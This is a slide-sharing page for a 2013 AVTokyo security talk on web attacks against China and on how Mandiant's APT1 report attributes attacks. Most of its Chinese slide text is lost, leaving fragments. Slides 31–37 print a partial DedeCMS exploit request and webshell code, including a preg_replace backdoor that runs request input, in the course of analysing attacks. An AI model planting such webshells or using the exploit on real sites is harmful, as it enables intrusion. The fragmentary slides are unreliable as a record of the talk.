avtokyo 2013.5 - china is a victim, too :-)

Download AVTokyo 2013.5 - China is a victim, too :-)

Post on 27-Jun-2015

3.029 views

Category:

Technology

2 download

Embed Size (px)

DESCRIPTION

{Anthony LAI, Zetta KE}, Researcher [en] China is a victim, too :-) アンソニー・ライ、ゼッタ KE 中国はいつも他者を攻撃する攻撃者として認識されているが、逆に「中国が誰かから攻撃を受けているのではないか?」という視点で、どのような攻撃をうけ、どんな理由があるのか?をお見せしよう。 さらに、他の有名な機関から発表されたAPTの調査報告書の内容から、中国からの攻撃を「推測」し、それらの「論理」についてのコメントする。 また、我々はKnownsecからキャプチャされたWeb攻撃データをVXRLで解析を行っており、うまくいけば、より鮮明な絵をお見せすることができると考えている。 もちろん、アジェンダにないオフレコ情報もあるので、みなさんに楽しんでもらえると思う。 China is always taken as an attacker to attack others, let us take a look who is attacking China, what kind of attacks China is suffering from and the possible reason, moreover, we would like to take APT research report published from other famous agency how they "deduce" the attacks from China, commenting on their "logic". In addition, we have got Knownsec to provide captured and identified Web attack data to VXRL for analysis, hopefully, we could get a much more clearer picture. Of course, we got a hidden agenda as well. It would be a fun session and let us enjoy it..

TRANSCRIPT

  • 1. China is a victim, too :) (AVTokyo Special Edition) Darkfloyd x Zetta, VXRL

2. 3. : Part1: Web Part2: Part3:APT1 (Ran2 ) 4. Part 1: Web 5. Knownsec FW / VXRL 11 11 / (Single's Day, ) IP 6. Single's Day, ? 7. Single's Day, ? 8. Singles Day http://en.wikipedia.org/wiki/Singles_Day 9. vs 10. 11/11 vs 1 11. 11/11 vs : 1 12. Attack Type SCANNERNo. of RequestPercentage5910124891.3447%LRFI2187530.3381%FILEI2227740.3443%SPECIAL358380.0554%WEBSHELL424630.0656%44916256.9421%SQLI2747920.4247%XSS2257960.3490%10220.0016%861400.1331%8870.0014%64701338100.00%COLLECTOROS_COMMAND CODE OTHERS 13. (2013/11/11) 97.5 % IP 2.5% 14. Country Attack China 1070489 US 18588 Netherlands 5404 Hong Kong 4288 Korea 1823 Turkey 1429 Japan 872 15. 2524 16. 17. Tou.php Tou , 6.5GB 18. Abuse X-Forwarder to fake different IP address to voting from 58.64.X.X 19. ISP :) 20. 11/11 (Singles Day) 47 OS 21. Country China US Korea Hong Kong Thailand Taiwan JapanIP 116.252.224.162 173.208.240.190 119.70.29.137 58.64.205.27 110.34.230.226 118.233.66.105 202.89.232.79 22. Python 7 DDos 0:00-2359 23. IP :) http://www.dklkt.cn/article.asp?id=233 24. 25. CMS CMS 26. 27. webscan.360.cn IP 28. 315online.com.cn 29. 30. Wordpress 31. /plus/download.php?open=1&arrs1%5B %5D=99&arrs1%5B%5D=102&arrs1%5B %5D=103&arrs1%5B%5D=95&arrs1%5B %5D=100&arrs1%5B%5D=98&arrs1%5B %5D=112&arrs1%5B%5D=114&arrs1%5B %5D=101&arrs1%5B%5D=102&arrs1%5B %5D=105&arrs1%5B%5D=120&arrs2%5B %5D=109&arrs2%5B%5D=121&arrs2%5B Dedecms Webshell Dedecms http://www.wooyun.org/searchbug.php?q=dedecms 32. Dedecms ( CMS) 33. DedeCMS 34. : DedeCMS Exploit Interesting technique to hid the webshell: put it like a cache file. http://www.nxadmin.com/penetration/1168.html http://blog.csdn.net/seoyundu/article/details/12855759 /plus/download.php exploit - Inject Webshell http://www.xiaosedi.com/post/dedecms_exp_01.html /plus/search.php exploit - Inject Webshell http://eoo.hk/oswork/28.htmDedeCMS backdoor killer from Anquan.org http://edu.cnw.com.cn/edu-security/netsec/websec/htm2013/20130807_27895 35. 90sec.php .inc : {dede:php}file_put_contents(90sec.php,'); {/dede:php} data/cache htm (myad1.htm,myad-16.htm,mytag-1208.htm) : ); > axxxxx);echo OK;@fclose($fp);?>); > guige, 90sec.org;@preg_replace(/ [copyright]/e,$_REQUEST['guige'],error);?>); > 36. .htm webshell .htm php include /mytag_js.php 37. ID URL webshell : http://www.nxadmin.com/plus/mytag_js.php?id=1208 http://www.nxadmin.com/plus/ad_js.php?id=1 :http://www.nxadmin.com/penetration/1168.html 38. Part 2: 39. Wooyun: Miter CVE ( http://www.wooyun.org/whitehats/) 40. #1: CMS ( )http://www.wooyun.org/bug.php?action=list&subtype=52 41. #2: 360 360 ! -_- 42. ( )http://www.wooyun.org/corps/%E5%A5%87%E8%99%8E360 43. #3: 44. Zoomeye (www.zoomeye.org) 45. : Anquan.org ( ) 800 http://www.anquan.org/help/aboutus/authen/ 46. Part 3: APT1 - VXRL Ran2 47. APT1 : Mandiant APT1 VXRL Ran2 Mandiant 61389 : 48. Mandiant APT1 2013 2 18 Mandiant "APT1: " Mandiant PLA 61398 APT APT1 49. Mandiant APT1 Mandiant APT "Mandiant Beijing " "Mandiant PLA " 50. #1: APT1 Mandinat Mandinat APT1 APT1 51 APT1 APT1 ( )APT1 FQDN ( FQDN ) ( ) Rootkit.com 51. #1: APT1 3 PLA Mandiant UglyGorilla UG 52. #1: Jack Wang UglyGorilla Jack Wang 15 2 APT1 53. #1: UglyGorilla APT1 Jack Wang Wang Dong PLA 61398 54. #1: UglyGorilla APT1 DOTA DOTA RDP 55. #1: DOTA DOTA 2j3c1k 3 2 56. #1: APT1 PLA 61398 57. 2 Mandiant 4 1905 1849 - Microsoft OS Microsoft OS Mandiant APT1 58. 2 RDP RDP 4 RDP RDP - US 0x0804 4 59. APT1 http://espionageware.blogspot.hk/ 60. 11 11 Web ( ) SQL CMS 61. 62. Thank you so much :) Zetta Ran2 Knownsec darkfloyd@vxrl.org ozetta@vxrl.org ran2@vxrl.org